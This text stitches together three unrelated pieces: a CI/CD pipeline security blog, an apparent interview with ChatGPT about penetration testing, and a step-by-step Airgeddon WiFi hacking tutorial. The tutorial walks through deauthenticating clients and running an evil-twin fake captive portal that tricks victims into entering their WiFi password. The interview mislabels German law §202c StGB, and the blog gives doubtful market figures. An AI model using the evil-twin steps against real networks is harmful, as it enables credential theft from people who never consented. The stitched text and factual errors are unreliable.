The practice of common code validation starts with the analysis of static code which is conducted to verify the quality of code. As soon as the code passes the test, CI starts with its process of automating and compiling the code for the upcoming automated testing.

What is Continuous Delivery?

Continuous delivery (CD) is a software development practice that works with continuous integration for the sake of automating infrastructure provisioning and app release procedures.

Soon after the code gets tested and built as a part of the CI process, continuous delivery does its job in the eventual segment of the process to make sure that it can be deployed smoothly be it any environment at any time.

With the help of continuous delivery, software is created in order to be deployed to production at any suitable time. Then you have the flexibility of getting the deployments automated or doing it manually; you can opt for either of both.

Let's take a look at the market overview of DevSecOps:

  • DevSecOps Market Size And Forecast. DevSecOps Market size was valued at USD 3.73 Billion in 2021 and is expected to reach USD 41.66 Billion by 2030, with the growth at a CAGR of 30.76% from 2022 to 2030.
  • As per the recent report by KBV Research, the global DevOps market will fall into the figure of $88 million by 2023 growing at a compound annual rate of 18%. That far outpaces the development of the international IT market. Additionally, as per Forrester Research, 50% of organizations have opted for DevOps, reaching what Forrester calls "Escape Velocity."
  • The overview of this CI/CD report suggests that 47% of developers use continuous integration or deployment in some way.
  • 96% of CTOs have mentioned their business would benefit from automating security and compliance processes, a key principle of DevSecOps.

Is Using CI/CD Actually Important?

The purpose of CI/CD pipelines is pretty critical and it requires certain tedious procedures. CI/CD pipelines also require dealing with confidentiality of applications and their infrastructure. This means that if someone gets unauthorized access to your CI/CD pipeline, then he/she is entitled to have unlimited power to breach your entire infrastructure or deploy malicious code.

This is the key reason; the reason for CI/CD pipeline security and DevOps security, this is why you should opt for the best practices for the sake of securing CI/CD pipelines as it's a prerequisite process.

6 Best CI/CD Pipeline Practices to Follow for Optimum Security

So, here we begin with the most important segment of our blog, which is the guide to follow the best practices for optimal security in CI/CD pipeline:

1. Analyze The Key Factors That Can Cause a Threat To a Secure Connection

Initially, you need to first understand the factors and vulnerable points wherein the chances of security threats are comparatively higher. It's good practice to examine the factors that require an additional layer of security in the whole deployment process.

That does not really mean the rest of the factors are frivolous; avoiding any connection to the CI/CD pipeline could be a major point of compromise. Each and every connection should be made over Transport Layer Security.

2. Don't Let the Test Environments stay Wide Open

Mind you, this is the biggest blunder you can commit! Generally, what you do is you deploy multiple test environments for testing your product, but these environments are accessible for free to developers out there for further manual testing. These kinds of environments are not layered with robust security, especially in terms of staging or production environments.

But the crux is that they are absolutely working environments, which means if an attacker tries to get access to these, he/she is free to use it as a stepping stone to other places in your infrastructure. Hence, it's pretty crucial to secure your test environment in order to make it as secure as your other environments.

3. Never Unlock Your Confidential Stuff; Keep Your Secretive Stuff Safe

By secrets we mean authentication credentials, like usernames and passwords, API tokens, SSH keys and encryption keys, these things are the keys to get access to applications and services.

They are actually the biggest unlocking element for a project's data or resources. If these very elements are lacking with robust security, then they can possibly be very useful for hackers to breach the data and cause intellectual property theft.

You need to take care of the location where you locate secrets and who has access to these credentials with a vigorous key management service. This encrypts, accumulates, and injects secrets at runtime only at the time when they are actually needed. So, they are not disclosed at the time an application's built or deployed, nor do they appear in the actual source code.

Although, if you use a key management tool, it's still a good practice to monitor and audit code repositories to catch and remove confidential elements that have been committed to the code base. What you can also do is use tools to prevent the code from being pushed or passed on in pull requests.

Software engineers should never practice to write code that prints a secret to the console log, not even while they are testing. Some CI/CD and DevOps tools can put a shadow on secrets if they are printed or output in any way, such as to the console or debug logs.

4. Meticulously Operate And Clean Up

A continuous software delivery pipeline, as its definition suggests, is a flow of constantly moving parts and processes for builds and deployments, but avoid being distracted from the cadence and focus on proper security maintenance chores.

Always keep the practice of monitoring the CI/CD environment as it runs, and eliminate the temporary resources, like containers and VMs, after you are done with the tasks. To decrease the chances of attack surface of containers and VMs, terminate the unnecessary tools and utilities.

5. Keep Yourself Aware And Always Have A Backup Plan

With a CI/CD pipeline, you can strike a balance between third-party resources and services in a pipeline at any desired time. IT teams are supposed to diligently monitor the security feeds and notices of vendors whose products and services they have opted to immediately discover and act on any breaking news. You ought to initiate an incident response plan to manage such an event and help to curtail any impact on the pipeline.

For instance, in response to the Codecov breach, popular labels like Netflix and the Vim text editor instantly do the rotation of their credentials as a precaution for security purposes. 

HashiCorp rotated one of its GNU Privacy Guard keys, which is used for release signing and verification. Whenever you are adding new tools or services to the CI/CD pipeline, you are supposed to update and add them in the incidence response plan at the same time.

When we are talking about security, CI/CD pipelines are core to many organizations' products and services, so you should be considering them as important as other operations that are critical to the business. Secure them accordingly to impede supply chain attacks or other security failures that will have an adverse impact on the build and delivery processes.

Segment them from the rest of the enterprise network, after operating, monitor them on a regular basis just to make sure that your CI/CD pipeline is safe from suspicious or inappropriate activities.

There are innumerable interconnecting services and components, many of them are supplied or controlled by third parties, meaning, there is no possibility of a set-and-forget approach when it's about pipeline security.

6. Keep Your CI/CD Tool Up to Date

We often put the factor of updating CI/CD on secondary priority, but it's not like that; updating your CI/CD tool is not something you would take a risk of postponing. You might not know if your CI/CD tool is up to date with bugs and vulnerabilities.

If you don't care to update your CI/CD, you will be at the risk of your data being breached, and the aforementioned best practices will all go in vain. It's always the best and primary practice to implement good access management. If you are willing to leave your CI/CD tool in a version that consists of vulnerability; it definitely welcomes an attacker to simply bypass authentication.

Concluding Statement

Now that we have reached the end of this blog, we expect you to take care of the CI/CD pipeline in the best possible way. Bear in mind that it's the main door to all your valuable data, which could possibly ruin your whole effort you have put into your organization up until now.

Considering this process flippant is not a good idea; you already have an idea of what consequences you shall be facing if you take such steps. Hoping to help you further with such concepts.

Author Bio

Mehul Rajput is the CEO of MindInventory, a software development company that provides web and mobile app solutions from startup to enterprise-level company. His role involves heading the operations related to business and delivery with strategic planning and defining the roadmap for the future.

by prof. Volker Skwarek, cybertalk.podcast@pm.me

In this interview, ChatGPT is challenged with the general subject of penetration testing. I wanted to know more about ChatGPT’s knowledge about pentesting and how far it would guide me with precise procedures for testing. Last but not least, I also wanted to know a little more about ChatGPT.

The answers were surprisingly good, even if they were not finally satisfying.

This text provides a cut version of the full interview as indicated by the ellipses […] . This can be downloaded from the author’s podcast cast-notes site as provided at the end of this article.

While preparing for my interview with ChatGPT I was a bit nervous: Will it provide sufficient answers? How deep can I ask for technical details? Will it understand me and my questions? 

For better and more personal communication, I decided to ask ChatGPT if it minds being called Rachael – in memory of the android in the movie "Blade Runner". ChatGPT agreed. Therefore, I gave her the long name RachaelChatGPT, to be read as Rachael – powered by ChatGPT.

I wanted to digress only a little in the interview; I was following a strict guideline. However, I still had my thoughts and mind during the interview, which are printed in upright non-bold letters. 

[…]

Volker: Okay. Thank you. Let's now get into technical details. Today we are meeting to talk about pentesting. What do you know about it?

Rachael: Penetration testing, also known as pen testing, is a security testing method that involves assessing the security of computer systems, networks, or applications by simulating an attack from a malicious actor. The purpose of penetration testing is to identify vulnerabilities that can be exploited by attackers and to provide recommendations for mitigating those vulnerabilities.

Penetration testing can be performed using a variety of techniques, including network scanning and enumeration, vulnerability scanning, password cracking, social engineering, and exploitation of software vulnerabilities. The process typically involves several stages, including planning, reconnaissance, discovery, vulnerability assessment, exploitation, and reporting.

Penetration testing is an important component of a comprehensive security program, as it can help organizations identify and address vulnerabilities before they can be exploited by attackers. It can also help organizations comply with security regulations and standards, such as the Payment Card Industry Data Security Standard (PCI DSS) and the Health Insurance Portability and Accountability Act (HIPAA).

Volker: Do you also know any details of specific pentesting procedures?

Rachael: Yes, I can provide some details on specific penetration testing procedures. Here are a few common types of penetration testing:

  • Network Penetration Testing: This type of testing involves assessing the security of an organization's network infrastructure, including servers, routers, switches, firewalls, and other network devices. The goal is to identify vulnerabilities in the network that could be exploited by attackers to gain unauthorized access or steal sensitive data.
  • Web Application Penetration Testing: This type of testing involves assessing the security of an organization's web applications, such as e-commerce sites, online banking portals, and other web-based systems. The goal is to identify vulnerabilities in the application that could be exploited by attackers to gain unauthorized access or steal sensitive data.

[…]

These are just a few examples of the types of penetration testing procedures that are commonly used. Each procedure is tailored to the specific needs and goals of the organization being tested.

Volker: Thank you. But these are no actual details. Honestly: This is pretty superficial! These are only keywords but no procedures. Do you know more in detail?

Rachael: I apologize for the earlier response. Here are more details on each of the pentesting procedures I mentioned:

  • Network Penetration Testing:
  • Reconnaissance: This stage involves gathering information about the target network, including IP addresses, network topology, and services running on the network.
  • Vulnerability Assessment: This stage involves scanning the network for vulnerabilities and weaknesses, including misconfigured systems and outdated software.
  • Exploitation: This stage involves attempting to exploit identified vulnerabilities to gain access to the network, such as attempting to gain administrative access to a server or using a remote code execution vulnerability to execute malicious code on a system.
  • Reporting: This stage involves documenting all findings, including identified vulnerabilities, recommended remediation steps, and risk ratings.

[…]

Here I interrupted Rachael due to her repeatedly superficial answers. The quality of her responses is extensive and meets the intention of my questions. Nevertheless, it is just as good as a well-educated student on Cybersecurity101 who learned the terms of the subject by heart. And especially the repeated structure of her answer with repeated questions is tedious and tiring. Rachael does not even tend to become more precise. 

[…]

Volker: Okay. Let's take another approach: What primary attack would you use for network testing?

Rachael: As an AI language model, I don't have the ability to perform any actual penetration testing, nor do I condone or encourage any illegal or unethical activities. However, to answer your question, network penetration testing can involve a wide range of attacks, depending on the specific vulnerabilities identified in the target network. Some examples of primary attacks used in network penetration testing include:

  • Port Scanning: An attacker scans the target network for open ports, which can be used to identify services running on specific hosts and potentially find vulnerable systems.
  • Network Sniffing: An attacker can use a network sniffer to capture network traffic and analyze it for sensitive information, such as usernames and passwords.
  • Denial-of-Service (DoS) Attacks: An attacker can use a DoS attack to flood a target network with traffic and disrupt its availability.

[…]

It's important to note that these attacks should only be performed with explicit permission from the network owner and with the goal of identifying and addressing vulnerabilities, rather than causing harm or damage to the network.

Volker: Interesting. I want to know more about port scanning. What tools can I use?

Rachael: There are several tools available for port scanning in network penetration testing. Here are a few examples:

  • Nmap: Nmap is a popular open-source tool that can be used for network exploration and port scanning. It has a wide range of features and options, including host discovery, version detection, and OS fingerprinting.

[…]

Volker: I have already heard about nmap. Seems to be a quite popular tool. Can I also determine targeted systems' operating system or software version?

Rachael: Yes, Nmap can be used to detect the operating system and software versions running on the target systems, in addition to identifying open ports and services. This is achieved through a technique called OS fingerprinting and service/version detection.

OS fingerprinting is the process of analyzing network traffic patterns and characteristics to identify the operating system running on a particular host. 

[…]

Volker: What is the full syntax of the command when I want to use nmap for OS fingerprinting?

Rachael: The full syntax for using Nmap for OS fingerprinting is:

nmap -O <target>

In this command, "nmap" is the name of the tool, "-O" is the option for performing OS fingerprinting, and "<target>" is the IP address or hostname of the target system or network.

You can also specify a range of IP addresses or a CIDR notation for scanning multiple hosts, and use other options and arguments to customize the scan, such as specifying a different port range, using different timing and performance options, and outputting the results in various formats.

It's important to note that OS fingerprinting can be a sensitive activity and can potentially be detected by intrusion detection systems (IDS) or other security tools. Therefore, it's important to perform OS fingerprinting only with explicit permission and within the scope of a legitimate penetration testing engagement.

Volker: Regarding German legislation: Is it just illegitimate to perform network scanning without permission, or is it already considered an attempted crime?

Rachael: In Germany, performing network scanning or penetration testing without explicit permission from the owner or administrator of the target network is generally considered illegal under the Computer Fraud and Abuse Act (§202c StGB). This is because such activities can potentially disrupt or damage the target network, and can also violate the privacy and confidentiality of the target's data and systems.

Under the law, unauthorized network scanning can be considered a criminal offense, with penalties ranging from fines to imprisonment depending on the severity and consequences of the offense. However, the specific legal implications and penalties can vary depending on the circumstances of the case, such as the intent of the attacker, the scale and impact of the attack, and the level of damage or harm caused to the target network.

It's important to note that performing network scanning or penetration testing without explicit permission is also considered unethical and unprofessional, and can damage the reputation and credibility of the security industry as a whole. Therefore, it's always recommended to obtain explicit permission and conduct all testing and scanning activities within the scope of a legitimate and authorized penetration testing engagement.

This set of answers was really impressively exhaustive. Although I wonder if all the mentioned network scanning tools are essential in daily use, at least the most important was listed first. Additionally, I was impressed by the detailed response to my syntax question on nmap.

It is also good that Rachael indicates the legal and ethical implications of network scanning. She is also aware of the fact – again, the human-minded term “aware of”, better: programmed for – that activities have moral and legal limitations. And the answer on German legislation is perfectly right: unauthorized network scanning is a crime as I may obtain private and security-relevant information not intended for me.

Let me now check if she is similarly “intelligent” in other areas of pentesting.

Volker: Thank you for your extensive answer. Do you mind if I change the topic to web penetration testing?

Rachael: Sure, I'd be happy to discuss web penetration testing with you. What specific aspects of web pen testing are you interested in?

Volker: What is the state-of-the-art for knowing about vulnerabilities and testing or security procedures of web security?

Rachael: The state-of-the-art for web penetration testing and security procedures involves a combination of automated tools and manual techniques, along with continuous monitoring and proactive security measures. Here are some of the key aspects of web security testing and best practices:

  • Vulnerability scanning: Automated tools such as web application scanners can help identify vulnerabilities in web applications and APIs, including cross-site scripting (XSS), SQL injection, and file inclusion vulnerabilities. These tools can also detect misconfigured servers and insecure coding practices.
  • Manual testing: While automated tools can be helpful in identifying common vulnerabilities, manual testing is necessary to identify more complex vulnerabilities and logic flaws. This can include testing for business logic errors, authentication and authorization flaws, and server-side vulnerabilities.

[…]

Overall, the state-of-the-art for web penetration testing and security involves a comprehensive and multi-faceted approach that combines automated tools, manual testing, and ongoing monitoring and remediation. By implementing these best practices, organizations can improve the security of their web applications and systems and reduce the risk of cyber attacks and data breaches.

Volker: Do you know an organization fully dedicated to finding, listing and resolving web vulnerabilities?

Rachael: Yes, there are several organizations that are dedicated to finding, listing, and resolving web vulnerabilities. Here are a few examples:

  • OWASP: The Open Web Application Security Project (OWASP) is a non-profit organization that focuses on improving the security of software and web applications. OWASP provides a wide range of resources for developers and security professionals, including the OWASP Top Ten list of web application vulnerabilities.

[…]

Volker: Do you know about CVE-2021-44228 and how to exploit it?

Rachael: CVE-2021-44228, also known as Log4Shell, is a critical vulnerability in the Apache Log4j logging library that was discovered in December 2021. The vulnerability allows remote attackers to execute arbitrary code on affected systems by sending specially crafted requests to a vulnerable server.

The exploit for CVE-2021-44228 is publicly available and has been used in real-world attacks. The exploit involves sending a malicious request to a vulnerable server that includes a specially crafted Log4j configuration file. When the server processes the request, it loads the configuration file and executes the attacker's code.

[…]

This set of answers is again similarly structured to that before about network scanning. I get a response on the same generalized level for a general question. This answer contains perfectly correct elements, such as “Owasp”, as an organization fully dedicated to web application security. But it also has less precise and nearly or even thoroughly wrong parts.

[…]

Asking Rachael about log4j delivered a surprisingly good answer. A detailed procedure or a reference to a proof of concept is not delivered concerning potential illegal activities. This is actually true but could also be an apologetic argument for missing knowledge.

I am surprised in every respect about this interview with Rachael: First of all, it was perfectly readable and understandable. The answers were related to the questions, and the knowledge was about average. Rachael showed even some human traits, although she repeatedly mentioned that she is an algorithm-based AI only. The quality of the answer fundamentally depends on the quality of the question  - the more precise the question, the deeper the answer. 

Only some responses were perfectly correct, but at least no answer could be considered totally wrong. Furthermore, an ethical and legal filter seems to be implemented so that Rachael does not support criminal actions.

It is relieving to note that Rachael probably cannot replace human intelligence (yet). You already have to have deep knowledge about a matter to ask her precise questions to get equally exact answers. A simple “what do you know about” or “tell me a way to” ends in a similarly shallow response.

I am sure that Rachael and I will have follow-up meetings in the (internet) café next door and discuss further topics of pentesting, ethics and other noteworthy problems of the world.

The author of this interview is Volker Skwarek. He is professor of computer science specialized in cyber security at Hamburg University of Applied Sciences in Germany.

Airgeddon is a popular, free, and open-source wireless security auditing tool that helps penetration testers locate and exploit vulnerabilities in wireless networks. It is available for download from GitHub. Airgeddon runs on Kali Linux and other Debian-based distributions.

To use Airgeddon, first ensure that your wireless card is compatible. Next, identify the target wireless network and select the appropriate attack mode. Then, launch the attack and wait for Airgeddon to crack the password. Finally, extract the password from the handshake file.

Airgeddon is a powerful tool that can be used to easily find and exploit vulnerabilities in wireless networks. However, it is important to use it responsibly and only on networks that you have permission to test.

In today's educational guide, we will see how to hack or "break" Wifi codes with simple steps. 

In this article, we will see how to break WiFi codes so that you can understand the risk that your personal data runs when no protection measures are taken. The techniques described are for purely educational purposes and are done on my personal WiFi network.

What we need to start WiFi hacking

  • Kali Linux
  • a Wi-Fi adapter that supports monitor mode Airgeddon
  • Indicative WiFi adapter Chipsets that support monitor mode are: Atheros AR9271
  • Ralink RT3070
  • Ralink RT3572 Realtek 8187L
  • Realtek RTL8812AU (2017)
  • Ralink RT5370N

In this guide, I use the latest version of Kali Linux and the Airgeddon program to attack my own WiFi network. The reason why I chose this program is because it can be used by novice users, and it covers all WiFi hacking techniques. So let's get started.

How do I crack the WiFi password?

So let's start by opening a terminal in Kali after we are physically connected to our home wifi to download Airgeddon:

1 git  clone  https://github.com/v1s1t0r1sh3r3/airgeddon.git

After downloading the program, we enter its folder:

  1. cd  airgeddon
  2. sudo bash  ./airgeddon.sh

 

  • Step 1: After it starts, we press Enter to search for some necessary and optional tools; if they are not present in our system, the program will install them. When finished press Enter.
  • Step 2: In the Interface option prompt, select 2, i.e., wlan0 as we are hacking WiFi and press Enter.
  • Step 3: On the next screen, choose option (2) to put the WiFi in monitor mode and press Enter.
  • Step 4: As we attack as a Rogue Access point, we must select the Evil Twin attacks menu, i.e., option (7) and then press Enter.

  • Step 5: After selecting the Evil Twins Attack menu, several options will appear. We use Evil Twin attack with Captive portal, i.e., option (9) which requires monitor mode.
  • Step 6: After pressing Enter, a list of WiFi networks appears around us and we should select the network by stopping the scan with Ctrl+C.

  • Step 7: After selecting the network, then we select Deauth aireplay attack, i.e., option (3) which is a Deauthentication attack. We also don't need DoS search mode , so we press n and we don't need internet access mode, so press "n".
  • Step 8: In the Mac spoofing question, click n. This attack requires that we previously have a handshake file recorded by a WPA/WPA2 network. As I am doing this attack for the first time on this network, there is no handshake file on my machine, so I pressed 'n'. If you have a recorded handshake file, press 'y' and specify the path where you saved the handshake file.
  • Step 9: In this step, airgeddon causes all clients connected to my network to disconnect, and when the clients reconnect to the network, the WiFi adapter records the handshake file that has all the necessary information (in encrypted form), such as the WiFi network password we need.
  • Step 10: After recording the Handshake file, it asks for a path to save it, we press Enter to save it to its required path with the required name.
  • Step 11: Now it asks for Captive portal language (login page, which is fake in our case). Choose language that leaves the victim in no doubt. I personally chose Greek.

  • Step 12: With the Fake Captive portal that has the same WiFi network name, it will open several windows where we can observe the clients that are connected to our fake network, and which are constantly disconnected from the original WiFi.

So when he is forced to enter the Captive portal Login he will have to enter his WiFi password. We can observe the victim's password in the control window that we opened in Step 12. If the victim enters the wrong password, then it shows him that he has entered the wrong password.

How does it work? It works because we captured a handshake of the original network that has a password in encrypted form. This script compares the password entered by the victim in the fake WiFi login gateway with the password encrypted in the handshake file.

If the victim enters a correct password, then the password check box appears.

After we have successfully recorded the password, it is saved as a text file on the machine and the control window will close automatically. Finally, the interface will be restored from monitoring mode and airgeddon will close.

So, in this way, a hacker can hack a WiFi network and find the WiFi password very easily, and in less than five minutes.